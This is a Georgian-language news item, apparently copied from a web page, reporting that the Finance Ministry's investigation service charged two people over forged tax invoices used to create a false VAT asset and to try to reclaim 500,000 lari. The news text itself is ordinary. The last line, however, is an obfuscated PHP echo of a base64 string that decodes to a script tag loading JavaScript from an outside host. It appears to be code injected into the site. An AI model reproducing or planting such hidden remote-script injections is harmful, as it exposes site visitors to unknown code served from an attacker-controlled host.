celsiusi
ავერსი საქკაბელი

საგამოძიებო სამსახურმა ყალბი დოკუმენტებით დიდი ოდენობით სხვისი ნივთის მოტყუებით დაუფლების მცდელობის ფაქტზე ორი პირი პასუხისგებაში მისცა.

ამის შესახებ ინფორმაციას საქართველოს ფინანსთა სამინისტროს საგამოძიებო სამსახური ავრცელებს.

უწყების ცნობით, დანაშაული სასჯელის სახით თავისუფლების აღკვეთას 6-დან 9 წლამდე ვადით ითვალისწინებს.

„საქართველოს ფინანსთა სამინისტროს საგამოძიებო სამსახურის თანამშრომლებმა, გატარებული ოპერატიულ-სამძებრო ღონისძიებებისა და საგამოძიებო მოქმედებების შედეგად, ყალბი საგადასახადო დოკუმენტების დამზადება-გამოყენების გზით, მართლსაწინააღმდეგო მისაკუთრების მიზნით, დიდი ოდენობით სხვისი ნივთის, სამსახურებრივი მდგომარეობის გამოყენებით, ჯგუფურად მოტყუებით დაუფლების მცდელობის ფაქტზე, ორი პირი პასუხისგებაში მისცეს.

გამოძიებით დადგინდა, რომ ბრალდებულებმა, უკანონო მატერიალური სარგებლის მიღების მიზნით, წინასწარი შეთანხმებით, მათი მართვის ქვეშ მყოფი კომპანიების სახელით, დაამზადეს ყალბი საგადასახადო ანგარიშ-ფაქტურები, რომლითაც თითქოსდა განახორციელეს უძრავი ქონების ყიდვა-გაყიდვის ოპერაცია, რა გზითაც, უკანონოდ შეიქმნეს 998 389 ლარის ოდენობის დღგ-ს ყალბი აქტივი, საიდანაც შემდგომ შეეცადნენ სახელმწიფო ბიუჯეტიდან 500 000 ლარის დაბრუნებას.

გამოძიების ფარგლებში ჩატარებული საგადასახადო შემოწმების შედეგად, გაუქმებულ იქნა უსაფუძვლოდ შექმნილი დღგ-ს ყალბი აქტივი 998 389 ლარის ოდენობით.

გამოძიება მიმდინარეობს საქართველოს სისხლის სამართლის კოდექსის 210-ე მუხლის მე-2, 180-ე მუხლის მე-2 და მე-3 ნაწილებით, რაც სასჯელის სახით ითვალისწინებს თავისუფლების აღკვეთას 6-დან 9 წლამდე ვადით“,- აღნიშნულია უწყების მიერ გავრცელებულ ინფორმაციაში.

348
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");